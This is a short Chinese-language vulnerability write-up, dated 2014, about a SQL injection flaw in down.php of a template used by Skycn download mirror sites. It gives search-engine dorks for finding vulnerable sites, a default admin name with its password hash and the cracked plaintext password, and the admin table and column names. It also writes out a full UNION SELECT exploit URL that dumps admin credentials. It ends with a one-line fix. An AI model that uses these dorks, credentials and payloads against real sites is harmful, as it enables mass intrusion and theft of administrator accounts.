时间:2014-10-17 09:54:58 来源: 复制分享
天空下载站是国内著名的下载站点,提供国内外最新免费软件、共享软件下载。其在全国各地铁通、联通、电信、信息港等都建有以php+MySql架设的下载分站,相当一部分下载分站的建站程序采用同一套建站模板,而这套建站模板存在SQL注入漏洞。
关键词:inurl:down.php
漏洞文件:down.php
down.php中没有对get变量$id做任何过滤措施,导致攻击者可以任意使用SQL注入语句进行攻击,通过测试发现,多数管理员登陆口令默认密码并未修改,默认管理员信息为1111_7363a304be1a682efaf10702fc7b97d8,解密密码hash可知默认密码为sky!@#cn!
注入利用:
keyword:Copyright©1998 - 2007 Skycn.com All Rights Reserved inurl:down.php
http://site.com/down.php?id=1+union+select+column_numbers+from+table_name
column_numbers:不固定,通常为50+,也有少于40,例如临沂信息港测试为38个显示位
table_name:管理员表段名为master,字段名为username,password
在字段2软件标题显示位填写concat(username,0x5f,password)即可爆出管理员登陆口令
SQL EXP:
http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master
安全提示:
解决方法:$id=(int)$_GET['id'];